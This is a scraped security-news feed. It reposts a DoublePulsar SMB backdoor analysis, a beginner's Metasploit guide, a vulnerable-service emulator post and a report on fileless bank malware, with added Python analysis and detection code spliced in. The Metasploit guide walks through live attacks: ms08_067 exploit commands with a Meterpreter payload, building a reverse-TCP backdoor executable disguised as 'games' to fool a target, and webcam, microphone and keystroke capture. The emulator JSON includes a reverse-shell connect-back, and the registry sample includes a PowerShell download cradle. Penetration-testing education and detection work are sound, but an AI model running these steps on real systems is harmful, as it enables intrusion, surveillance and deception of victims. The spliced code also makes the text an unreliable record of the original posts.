ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.
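To make Steps 1 and 2 concrete, here is an added Python model of what the shellcode does; it is not code from the original post or from the DoublePulsar payload. A minimal PE32+ image is laid out in a bytearray (constructed test data, not a real ntoskrnl.exe), a fake interrupt-handler address inside it is walked back one page at a time until an MZ header is found, the PE signature is verified before the hit is accepted (a check worth adding: the two bytes "MZ" can occur by chance in code or data, and a decoy is planted here to show the difference), and the export directory is then searched by name hash exactly as user-mode shellcode does. The ROR-13 hash and the image layout are assumptions chosen for illustration; the page does not say which hash DoublePulsar uses.

```python
import struct
from typing import Dict, Optional

PAGE = 0x1000


def ror13_hash(name: str) -> int:
    """ROR-13 name hash (assumed for illustration; the real payload's hash is not given on the page)."""
    h = 0
    for ch in name.encode():
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ch) & 0xFFFFFFFF
    return h


def build_fake_kernel_image(exports: Dict[str, int]) -> bytearray:
    """Constructed minimal PE32+ image. RVAs: 0x0 DOS header, 0x80 PE header, 0x1000 export
    directory, 0x1100 AddressOfFunctions, 0x1200 AddressOfNames, 0x1300 AddressOfNameOrdinals,
    0x1400.. name strings, 0x3000 a decoy 'MZ' with no PE header behind it."""
    img = bytearray(0x4000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                 # e_lfanew
    pe = 0x80
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<H", img, pe + 0x18, 0x20B)           # OptionalHeader.Magic = PE32+
    struct.pack_into("<II", img, pe + 0x18 + 0x70, 0x1000, 0x200)  # export data directory (RVA, size)
    names = sorted(exports)
    ed = 0x1000
    struct.pack_into("<IIIII", img, ed + 0x14, len(names), len(names), 0x1100, 0x1200, 0x1300)
    str_rva = 0x1400
    for i, name in enumerate(names):
        struct.pack_into("<I", img, 0x1100 + 4 * i, exports[name])   # function RVA
        struct.pack_into("<I", img, 0x1200 + 4 * i, str_rva)         # name RVA
        struct.pack_into("<H", img, 0x1300 + 2 * i, i)               # ordinal (index into functions)
        raw = name.encode() + b"\0"
        img[str_rva:str_rva + len(raw)] = raw
        str_rva += len(raw)
    img[0x3000:0x3002] = b"MZ"                              # decoy: 'MZ' bytes without a PE header
    return img


def find_image_base(mem: bytearray, mem_base: int, handler_va: int) -> Optional[int]:
    """Step 1: from an IDT handler address, walk back in PAGE steps until a validated PE header."""
    va = handler_va & ~(PAGE - 1)
    while va >= mem_base:
        off = va - mem_base
        if mem[off:off + 2] == b"MZ":                        # cmp bx, 0x5a4d
            e_lfanew = struct.unpack_from("<I", mem, off + 0x3C)[0]
            if e_lfanew < PAGE and mem[off + e_lfanew:off + e_lfanew + 4] == b"PE\0\0":
                return va                                    # MZ *and* PE signature: real image
        va -= PAGE
    return None


def resolve_by_hash(mem: bytearray, mem_base: int, image_base: int, want: int) -> Optional[int]:
    """Step 2: walk the export directory and return the VA of the export whose name hashes to `want`."""
    off = image_base - mem_base
    pe = off + struct.unpack_from("<I", mem, off + 0x3C)[0]
    magic = struct.unpack_from("<H", mem, pe + 0x18)[0]
    dir_off = 0x70 if magic == 0x20B else 0x60             # data directory offset: PE32+ vs PE32
    ed = off + struct.unpack_from("<I", mem, pe + 0x18 + dir_off)[0]
    n_names, funcs, names, ords = struct.unpack_from("<IIII", mem, ed + 0x18)
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", mem, off + names + 4 * i)[0]
        name = mem[off + name_rva:mem.index(b"\0", off + name_rva)].decode()
        if ror13_hash(name) == want:
            ordinal = struct.unpack_from("<H", mem, off + ords + 2 * i)[0]
            return image_base + struct.unpack_from("<I", mem, off + funcs + 4 * ordinal)[0]
    return None


KERNEL_BASE = 0xFFFFF80000400000        # arbitrary constructed load address
EXPORTS = {"ExAllocatePool": 0x2000, "ExFreePool": 0x2100, "ZwQuerySystemInformation": 0x2200}
MEM = build_fake_kernel_image(EXPORTS)
HANDLER_VA = KERNEL_BASE + 0x3F40       # pretend IDT[0] points here, one page past the decoy 'MZ'


def demo() -> Dict[str, Optional[int]]:
    base = find_image_base(MEM, KERNEL_BASE, HANDLER_VA)
    return {n: resolve_by_hash(MEM, KERNEL_BASE, base, ror13_hash(n)) for n in EXPORTS}


if __name__ == "__main__":
    print(f"image base {find_image_base(MEM, KERNEL_BASE, HANDLER_VA):#x}")
    for name, va in demo().items():
        print(f"{name:26s} {va:#x}")
```

The decoy at RVA 0x3000 is skipped only because the PE signature is checked after the MZ match; the bare cmp bx, 0x5a4d the shellcode uses would stop there and dereference garbage.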

Step 3: Locate Srv.sys SMB Driver

A feature of ZwQuerySystemInformation is the SystemModuleInformation information class, with the value 0xb. This returns a list of all loaded drivers in the system.

The shellcode then searches this list for two different hashes and lands on Srv.sys, the kernel driver that implements the SMBv1 server.

The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

Step 4: Patch the SMB Trans2 Dispatch Table

Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

The .data section is generally read/write memory, and stored there is the SrvTransaction2DispatchTable, an array of function pointers that handle the different Trans2 subcommands.

The shellcode allocates some memory and copies over the code for its function hook.

Next the code stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.

That’s it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

Step 5: Send “Knock” and Raw Shellcode

Now when DoublePulsar sends its specific “knock” requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a status code (with 0x10 being “success”).

If you “knock” correctly, the backdoor will allocate an executable region of memory, copy over any shellcode you want, and run it. For instance, the Inject DLL payload in the framework is simply some DLL loading shellcode prepended to the DLL you actually want to inject.

Here is the disassembly of the hook function, which is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

Another thing to note, when we “burned” DoublePulsar (sent it the “uninstall” command from the framework), it did not restore the original SrvTransactionNotImplemented() function in the SrvTransaction2DispatchTable dispatch table. Instead, the hook remained but merely laid dormant, jumping over its “knock”/shellcode running section.
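The MultiplexID behaviour described in Step 5 is what a scanner keys on. Below is an added Python example (not code from the original post or from any existing scanner) that parses the fixed 32-byte SMB1 header of a Trans2 request and its response and reports whether the MID came back unchanged (a clean server) or bumped by a status code (the hooked SrvTransactionNotImplemented(), with 0x10 meaning success). The packets are constructed here with typical field values; the Negotiate, Session Setup and Tree Connect exchange that would precede a real knock, and the NetBIOS session prefix, are left out, and the assumption is that the caller hands in the header starting at the \xFFSMB signature.

```python
import struct
from typing import Optional

SMB_COM_TRANSACTION2 = 0x32        # Trans2: the command routed through SrvTransaction2DispatchTable
STATUS_NOT_IMPLEMENTED = 0xC0000002


def build_smb1_header(command: int, mid: int, status: int = 0, flags: int = 0x18,
                      flags2: int = 0xC007, tid: int = 0, pid: int = 0xFEFF, uid: int = 0) -> bytes:
    """Fixed 32-byte SMB1 header (constructed test data; values are typical, not captured)."""
    hdr = b"\xffSMB" + struct.pack("<BIBHH", command, status, flags, flags2, pid >> 16)
    hdr += b"\0" * 8                                        # SecuritySignature
    hdr += b"\0\0"                                          # Reserved
    hdr += struct.pack("<HHHH", tid, pid & 0xFFFF, uid, mid)
    return hdr


def parse_smb1_header(pkt: bytes) -> dict:
    """Parse the SMB1 header; the 4-byte NetBIOS session prefix is assumed already stripped."""
    if len(pkt) < 32 or pkt[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 header")
    command, status, flags, flags2, pid_high = struct.unpack_from("<BIBHH", pkt, 4)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", pkt, 24)
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": (pid_high << 16) | pid_low, "uid": uid, "mid": mid}


def knock_verdict(request: bytes, response: bytes) -> Optional[int]:
    """Compare the MultiplexID of a Trans2 request with its response.

    A clean server echoes the MID unchanged, so the result is None. The hook adds a status
    code to it instead; 0x10 is the "success" value the post describes, so any non-zero
    delta is the backdoor answering.
    """
    req, rsp = parse_smb1_header(request), parse_smb1_header(response)
    if req["command"] != SMB_COM_TRANSACTION2 or rsp["command"] != SMB_COM_TRANSACTION2:
        return None                                         # only Trans2 reaches the hooked slot
    delta = (rsp["mid"] - req["mid"]) & 0xFFFF
    return delta or None


def describe(delta: Optional[int]) -> str:
    if delta is None:
        return "clean: response MID matches request MID"
    if delta == 0x10:
        return "DoublePulsar present: MID bumped by 0x10 (success)"
    return f"DoublePulsar present: MID bumped by {delta:#x} (other status code)"


# Constructed exchange: a knock with MID 0x41 ...
KNOCK_REQUEST = build_smb1_header(SMB_COM_TRANSACTION2, mid=0x41)
# ... answered by an unhooked server (MID echoed, STATUS_NOT_IMPLEMENTED) ...
CLEAN_RESPONSE = build_smb1_header(SMB_COM_TRANSACTION2, mid=0x41,
                                   status=STATUS_NOT_IMPLEMENTED, flags=0x98)
# ... and by the hook (0x41 + 0x10 = 0x51, i.e. "success").
BACKDOORED_RESPONSE = build_smb1_header(SMB_COM_TRANSACTION2, mid=0x51, flags=0x98)

if __name__ == "__main__":
    print(describe(knock_verdict(KNOCK_REQUEST, CLEAN_RESPONSE)))
    print(describe(knock_verdict(KNOCK_REQUEST, BACKDOORED_RESPONSE)))
```

Because the "burned" hook stays resident, a host that no longer answers the knock can still be carrying the patched dispatch table; the MID check tells you whether the backdoor is live, not whether Srv.sys is clean.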

Conclusion

There you have it, a sophisticated, multi-architecture SMB backdoor. It’s a pretty cool payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard.

Source:https://zerosum0x0.blogspot.in/2017/04/doublepulsar-initial-smb-backdoor-ring.html

Beginners Guide To Metasploit https://www.securitynewspaper.com/2017/04/04/beginners-guide-metasploit/ Tue, 04 Apr 2017 03:35:58 +0000 https://www.securitynewspaper.com/?p=7798

The post Beginners Guide To Metasploit appeared first on Information Security Newspaper | Hacking News.

Metasploit can run on Linux, Mac OS X and Windows. It offers both a command-line interface and a graphical user interface (GUI). The Metasploit Framework can be extended with external add-ons written in multiple languages, which makes it a very powerful tool. Metasploit can be used to test target systems for vulnerabilities, either to protect them or to break into them; whether the use is legitimate or unauthorized, it clearly shows the importance of security.

To exploit a system using the Metasploit Framework you carry out 5 steps:
1. Choose and configure a pre-loaded exploit from the database.
2. Check whether the target system is susceptible to the exploit.
3. Configure a payload.
4. Encode the payload in order to hide it from an intrusion-prevention system (IPS).
5. Execute the exploit.

In order to choose an exploit and a payload, you need information about the target. There are many ways to gather it, from port scanning and OS fingerprinting tools such as Nmap to vulnerability scanners such as Nessus. I’ll leave the method of information gathering up to you.

Installation

Installation of the Metasploit Framework depends on your operating system and hardware, so rather than cover every eventuality I have provided links to both the Windows and Linux installation instructions:

Windows: LINK…
Linux : LINK…

I would however highly recommend that you download Kali Linux, which comes with the Metasploit Framework already installed.

Usage

Metasploit is a great tool and a must-have for all security/penetration testers. I will show you a few ways in which Metasploit can be used to exploit a target machine. (All my examples use Metasploit on Kali Linux against a Windows XP SP3 target.)

Exploit Ms08_067_netapi.

How to connect to and exploit a target machine using the Metasploit exploit ms08_067_netapi. First boot up Metasploit with the command msfconsole.

Now set up the Windows exploit with the following commands:
1. use exploit/windows/smb/ms08_067_netapi
2. set payload windows/meterpreter/bind_tcp
3. set RHOST 192.168.0.10 (this IP address is your target’s IP, obtained from a scan)
4. exploit (this command launches the exploit)

All being well you will be connected to the target and able to run a number of commands; the screenshot command is one example.

And that’s it, easy!

There are loads of commands available in the resulting session; just type help and a list will be displayed.
Examples are: recording audio from the microphone, taking snapshots from the webcam, capturing keystrokes and downloading files.

Social Engineering Example

Next let’s see how to gain access to a target’s machine using their own interaction. Why? Sometimes it is not possible to connect directly, for whatever reason, let’s say “security settings”. The following attack uses the target’s interaction to help us gain access.

So first things first, bring up a terminal window and type the command: se-toolkit

Then enter option 1 for social engineering attacks.

Now option 4 to create a payload and listener, and enter your IP address.

Now you need to pick the type of payload; we will go with option 2, Windows Reverse TCP Meterpreter.

Choose option 16, Backdoor Executable.
Leave the port set to 443.
(This is the port normally used for HTTPS, so outbound connections to it are rarely blocked and the reverse-shell traffic blends in with ordinary encrypted web traffic.)
And finally start the listener.

OK, so let’s recap: we have just created an executable file with a payload hidden within. The next part is a little tricky: you need to send the file to the target computer and get them to execute it, for example by calling it “games” and giving it a nice icon.

Before you send the file, navigate to where it was created, right-click it and open Properties.

Tick the box to allow the file to be executed as a program.

So now we wait… once the target executes the program you will get a new Meterpreter session.

From here on it is the usual meterpreter > prompt.
As before you can now run commands like screenshot or shell.
The target is yours!

Armitage

We’ve seen how to use Metasploit via the command line; now let’s see how to use the graphical front end Armitage, which lets us achieve the same goal.

Armitage is a GUI way of using Metasploit/Meterpreter rather than the command line, so let’s get started.

First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start. This starts the server and database.

Then type armitage in the terminal window and accept the default values.

You will probably get a popup asking to start Metasploit; click yes.

Don’t worry about the “connection refused” message; it just takes a while to load.
Once Armitage has booted, if it asks for the attack computer’s IP, enter your IP address.
Navigate to the Hosts tab > Nmap Scan > Quick Scan (OS Detect).

From here Armitage will scan a range or a single IP address of your choice and present the results in the black window. Right-click the target and click Scan.

When the scan is complete, expand exploit > windows > smb and double-click ms08_067_netapi.

This brings up an attack confirmation window; check the details and click Launch.

A successful exploit is confirmed in the console, after which you can right-click the target and perform multiple commands, for example Interact > “remote command shell”.

Websploit

As an added extra, Websploit uses exploits from Metasploit and has its own features as well, which are used to scan and analyse remote systems in order to find vulnerabilities. If you enjoyed this article please comment and I will do one for Websploit. Thank you.

Summary

Metasploit is a must-have for anyone interested in the world of security. You have just seen a few ways in which it can be used; keep in mind that this has only scratched the surface of what the tool can do. To find out more please follow the links below.

Source:https://www.hackthis.co.uk

New Metasploit RFTransceiver extension allows testing IoT services https://www.securitynewspaper.com/2017/03/22/new-metasploit-rftransceiver-extension-allows-testing-iot-sevices/ Wed, 22 Mar 2017 12:02:36 +0000 https://www.securitynewspaper.com/?p=7688

The post New Metasploit RFTransceiver extension allows testing IoT sevices appeared first on Information Security Newspaper | Hacking News.

Metasploit RFTransceiver extension implements the Hardware Bridge API that will allow organizations to test wireless devices operating outside 802.11 spec.

Recently we reported the news of the availability of a new hardware bridge for Metasploit extension to test hardware, including IoT devices.

Metasploit RFTransceiver extension

IoT devices are pervading our daily lives and modern businesses alike. They enlarge the attack surface, so tools that allow them to be tested rapidly are essential to preventing attacks.

The new Metasploit extension, the RFTransceiver radio frequency testing extension, allows researchers to discover security flaws in IoT radio communications.

“Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas,” writes Craig Smith, Transportation Research Lead at Rapid7 in a blog announcement today. These same devices can often contain flaws that can be used by attackers, but are unknown to the user.

Using the RFTransceiver companies will “be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.”

Smith took as an example the discovery of a vulnerability in a medical insulin pump made in 2016 by researchers at Rapid7.

One of the most disconcerting discoveries made by the researchers was that the remote control and the pump communicated over an unencrypted channel. An attacker could have exploited the flaw, tracked as CVE-2016-5084, to launch a man-in-the-middle (MitM) attack and intercept patient treatment and device data. The only consolation is that the exposed data does not include any personally identifiable information.

“We strongly believe that RF testing is an incredibly important — though currently often overlooked — component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk.” wrote Smith,  “We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.”

Many organizations already use devices operating on radio frequencies outside 802.11, such as RFID readers, components using the Zigbee communication protocol, and surveillance systems.

The RFTransceiver extension is designed to help organizations test them and evaluate their response to outside interference.

The new Metasploit RFTransceiver radio frequency extension is intended for testing, but there is a risk that criminals could abuse its capabilities to find and exploit vulnerabilities.

The response to the common criticism of any “dual use” technology is that attackers are already using these techniques; for this reason it is important to understand and anticipate their moves.

“The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.”

Experts who want to use the new Metasploit RFTransceiver extension need an RfCat-compatible device such as the YARD Stick One. They then need to download the latest RfCat drivers; included with those drivers is rfcat_msfrelay, the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat-compatible device attached.

Source:https://securityaffairs.co/

Penetration testing with Metasploit made easy https://www.securitynewspaper.com/2017/03/04/penetration-testing-metasploit-made-easy/ Sat, 04 Mar 2017 04:07:39 +0000 https://www.securitynewspaper.com/?p=7536

The post Penetration testing with Metasploit made easy appeared first on Information Security Newspaper | Hacking News.

Millions of IT professionals all over the world want to get into the hot field of security, and Metasploit is a great place to start. Metasploit Framework is free, used by more penetration testers than any other tool, and helps you understand security from the attackers perspective. There’s one problem: it’s hard to use Metasploit without vulnerable services to play against.

To help, the Metasploit team has created vulnerable OS images (Metasploitable2 and Metasploitable3), each containing dozens of vulnerable services that a user can cut their teeth on. However, these images cover only a small subset of the thousands of Metasploit modules available. You may wonder why we don’t have vulnerable services available for testing and training every module. The reason is simple: it can be very time-consuming and difficult to configure vulnerable services. First you have to obtain the vulnerable software, then install and configure each service. Sometimes older software is simply unavailable for download, either because it is too old or because the vendor removed it for security reasons. Depending on the software, setting up even one vulnerable service can take hours, if not days. While the Metasploitable VMs make the job of setting up your first vulnerability lab much easier, it is still not simple.

We developed the Vulnerable Services Emulator to fill this gap. It is a framework that makes it easy to emulate vulnerable services for penetration testing purposes. Right now it emulates over 100 vulnerable services, covering things like compromising credentials, getting a shell from the victim, and more. After going through the module exercises, users learn the details of security vulnerabilities and how to test for them, and are encouraged to continue learning and playing with Metasploit’s capabilities. It is like a high-interaction honeypot, but specially tuned to be exploitable.

This tool is very easy to install and use. All you need to run it is a working Perl installation for your favourite OS (Windows, Mac or Linux). Directions for installing the tool, which only takes a minute, are on the GitHub page for this project.

In addition to learning, the emulator can be used to perform system testing on Metasploit modules themselves, providing feedback to the community on how to make modules more effective. But the ultimate goal of the project is to help the community learn and make it even easier to get into penetration testing and Metasploit!

Example Usage

Here we are emulating a vulnerable printer service that is targeted by the Metasploit module exploits/windows/iis/ms01_023_printer. The IP address 0.0.0.0 means we bind to all interfaces and accept connections from any network. The default bind address is 127.0.0.1, which only accepts connections from the same host; this is the safer choice when your Metasploit instance is installed on the same machine.

Here is the Metasploit configuration, which targets the emulated service; you can see a session being established. Note that the commands are actually executed on the host running the emulator, so please run it in a safe environment if you don’t want that host to be owned 🙂

That’s pretty easy, right? What’s even nicer about this framework is how easy it is to develop a new emulated vulnerable service. We know developers have very different preferences in programming languages, so instead of implementing the vulnerable services in a particular language, the framework describes vulnerable service interactions in JSON. It is not a programming language per se, but it has enough logic for service emulation. The following is the description for the vulnerable printer service.

Simple JSON description of an emulated service:

    "exploits/windows/iis/ms01_023_printer": {
        "desc": "set payload windows/shell_reverse_tcp",
        "seq": [
            ["regex", "GET https:\/\/.*\/NULL.printer?"],
            ["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", ["action", ["connect", ":4444"]]]
        ]
    },

In the JSON above, the most important part is the “seq” section, which represents the sequence of messages used for the exploit. It has an even number of entries (in this case, 2). The odd-numbered entries are conditions. When a message comes in, it is matched against the odd-numbered entries starting from the first; when there is a match, the corresponding even-numbered entry is the action. Typically the action is sending a response, but it can also include an action such as making a new connection (connecting back to deliver the reverse shell session, in our case). This makes it easy to emulate vulnerable services and have them set up a connection back to the attacker.

At the core of the project, we implemented a framework (an interpreter) to execute the JSON based service description file. The current implementation is in Perl, but you can implement the framework in other programming languages of your choice.
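As an added example of what such an interpreter has to do, the following Python (not the project’s Perl implementation, and not code from the original post) executes the “seq” format exactly as the two paragraphs above describe it: conditions at the odd positions, actions at the even positions, first match wins. It is fed the printer description quoted on the page, pasted verbatim into a JSON document. Two things are assumptions: a bare string condition is treated as an exact match (the page only shows the ["regex", …] form), and the ["connect", ":4444"] directive is returned to the caller rather than actually opening a TCP connection back to the client, so the example runs offline; in the real emulator that directive is what produces the reverse shell. The sample request is constructed in the shape the regex expects; the real exploit’s oversized Host header is omitted.

```python
import json
import re
from typing import Any, List, Optional, Tuple

# The service description from the page, wrapped in a JSON document (the emulator's own file format).
SERVICE_JSON = r'''
{
  "exploits/windows/iis/ms01_023_printer": {
    "desc": "set payload windows/shell_reverse_tcp",
    "seq": [
      ["regex", "GET https:\/\/.*\/NULL.printer?"],
      ["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", ["action", ["connect", ":4444"]]]
    ]
  }
}
'''

Directive = List[str]


def condition_matches(cond: Any, message: str) -> bool:
    """Odd-numbered seq entries are conditions. The page shows ["regex", pattern];
    a bare string is treated as an exact match (an assumption, not documented on the page)."""
    if isinstance(cond, list) and len(cond) == 2 and cond[0] == "regex":
        return re.search(cond[1], message, re.S) is not None
    if isinstance(cond, str):
        return cond == message
    raise ValueError(f"unsupported condition: {cond!r}")


def unpack_action(entry: Any) -> Tuple[str, List[Directive]]:
    """Even-numbered entries are actions: a response string, or
    [response, ["action", [name, arg]], ...] when side effects such as "connect" follow."""
    if isinstance(entry, str):
        return entry, []
    response, extras = entry[0], entry[1:]
    return response, [x[1] for x in extras if isinstance(x, list) and x and x[0] == "action"]


def handle_message(seq: list, message: str) -> Tuple[Optional[str], List[Directive]]:
    """Walk the (condition, action) pairs in order; the first condition that matches wins.
    Returns (None, []) when nothing matches, i.e. the emulated service stays silent."""
    if len(seq) % 2:
        raise ValueError("seq must contain an even number of entries")
    for cond, action in zip(seq[0::2], seq[1::2]):
        if condition_matches(cond, message):
            return unpack_action(action)
    return None, []


def emulate(service: dict, message: str) -> dict:
    """One request/response round for a service entry. The real emulator would open a TCP
    connection back to the client for ["connect", ":4444"]; here the directive is only reported."""
    response, directives = handle_message(service["seq"], message)
    return {"response": response, "directives": directives, "payload_hint": service.get("desc")}


SERVICES = json.loads(SERVICE_JSON)
PRINTER = SERVICES["exploits/windows/iis/ms01_023_printer"]

# Constructed request matching the page's regex (the exploit's oversized Host header is omitted).
SAMPLE_REQUEST = "GET https://10.0.0.5/NULL.printer HTTP/1.1\r\nHost: 10.0.0.5\r\n\r\n"

if __name__ == "__main__":
    print(emulate(PRINTER, SAMPLE_REQUEST))
    print(emulate(PRINTER, "GET /index.html HTTP/1.1\r\n\r\n"))
```

Because the condition is an unanchored regex, anything containing the pattern triggers the connect-back; when you write your own descriptions, anchor the pattern (^…) unless you want the service to fire on incidental matches.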

The GitHub project page has more technical details on the tool and its usage. It is our hope that this tool helps you enjoy a better learning experience in the exciting field of security and eventually become a security professional. Be sure to let us know if you have any feedback!

Source: https://community.rapid7.com

The post Penetration testing with Metasploit made easy appeared first on Information Security Newspaper | Hacking News.

A rash of invisible, fileless malware is infecting banks around the globe https://www.securitynewspaper.com/2017/02/08/rash-invisible-fileless-malware-infecting-banks-around-globe/ Wed, 08 Feb 2017 15:40:39 +0000 https://www.securitynewspaper.com/?p=7328

The post A rash of invisible, fileless malware is infecting banks around the globe appeared first on Information Security Newspaper | Hacking News.

Once the province of nation-sponsored hackers, in-memory malware goes mainstream. Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran’s nuclear program.

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.

“What’s interesting here is that these attacks are ongoing globally against banks themselves,” Kaspersky Lab expert Kurt Baumgartner told Ars. “The banks have not been adequately prepared in many cases to deal with this.” He went on to say that people behind the attacks are “pushing money out of the banks from within the banks,” by targeting computers that run automatic teller machines.

The 140 unnamed organizations that have been infected reside in 40 different countries, with the US, France, Ecuador, Kenya, and the UK being the top five most affected nations. The Kaspersky Lab researchers still don’t know if a single group of individuals is behind the attacks, or if they’re being carried out by competing hacker gangs. The use of the fileless malware and command-server domains that aren’t associated with any whois data makes the already difficult task of attribution almost impossible.

Password harvesting

The researchers first discovered the malware late last year, when a bank’s security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft’s NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or hard drives, the attackers stashed the PowerShell commands into the Windows registry.

Fortunately, the evidence on the domain controller was intact, presumably because it hadn’t been restarted before Kaspersky Lab researchers began their investigation. An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code. The attackers, the researchers later determined, had used the tools to collect passwords of system administrators and for the remote administration of infected host machines.
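The one artefact this campaign leaves on disk is the PowerShell stashed in the registry. Below is an added Python example (not code from the article or from Kaspersky Lab) that takes a `reg export` style dump and triages string values for that pattern: it decodes any -EncodedCommand payload (base64 of the UTF-16LE script) so the indicators can see the real script, then scores each value against a small set of heuristics. The indicators (encoded command, download cradle, IEX, hidden window, execution-policy bypass) are assumed, widely used hunting heuristics rather than anything the article lists, and the registry dump is constructed for the example; on a real host you would feed it the output of reg export for the Run keys and any key an EDR alert points at.

```python
import base64
import re
from typing import Dict, List, Optional

# Assumed hunting heuristics for PowerShell parked in registry values (not from the article).
SUSPICIOUS = {
    "encoded-command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "download-cradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass-policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
}
REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')


def parse_reg_export(text: str) -> List[Dict[str, str]]:
    """Minimal parser for `reg export` (.reg) output: string values only, hex: blobs are skipped."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = REG_VALUE.match(line)
        if m and key:
            entries.append({"key": key, "name": m["name"], "value": m["value"].replace("\\\\", "\\")})
    return entries


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script; decode it or return None."""
    m = SUSPICIOUS["encoded-command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_registry_values(text: str) -> List[Dict[str, object]]:
    """Return every value that trips at least one indicator, with the decoded script when present."""
    findings = []
    for entry in parse_reg_export(text):
        decoded = decode_encoded_command(entry["value"])
        haystack = entry["value"] + ("\n" + decoded if decoded else "")
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(haystack)]
        if hits:
            findings.append({**entry, "indicators": hits, "decoded": decoded})
    return findings


# Constructed .reg dump (not real incident data): a benign Run entry, an encoded PowerShell loader
# in Run, and a cleartext download cradle parked under an unrelated key.
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
ENCODED = base64.b64encode(STAGE.encode("utf-16le")).decode()
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="C:\\Users\\admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"',
    f'"Updater"="powershell.exe -NoP -W Hidden -enc {ENCODED}"',
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01234567-89ab-cdef-0123-456789abcdef}\Stage]",
    f'"Script"="{STAGE}"',
])

if __name__ == "__main__":
    for f in triage_registry_values(SAMPLE_REG):
        print(f'{f["key"]}\\{f["name"]}: {", ".join(f["indicators"])}')
        if f["decoded"]:
            print("   decoded:", f["decoded"])
```

Decoding before matching is the part that matters: the encoded loader shows none of the cradle or IEX indicators in its raw form, which is exactly why the attackers encoded it.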

“We’re talking about a lot of incidents” that often varied in the way they were carried out, Baumgartner said of the infections the researchers found in the months following their initial discovery. “We’re looking at the common denominator across all of these incidents, which happens to be this odd use in embedding PowerShell into the registry in order to download Meterpretor and then carry out actions from there with native Windows utilities and system administrative tools.”

The researchers don’t yet know how the malware initially takes hold. Possible vectors include SQL-injection attacks and exploits targeting plugins for the WordPress content management application. Kaspersky Lab plans to provide more details in April about how the infections were used to siphon money out of ATMs.

Source: https://arstechnica.com/

Popular hacking toolkit Metasploit adds hardware testing capabilities
https://www.securitynewspaper.com/2017/02/03/popular-hacking-toolkit-metasploit-adds-hardware-testing-capabilities/ (Fri, 03 Feb 2017 14:45:17 +0000)

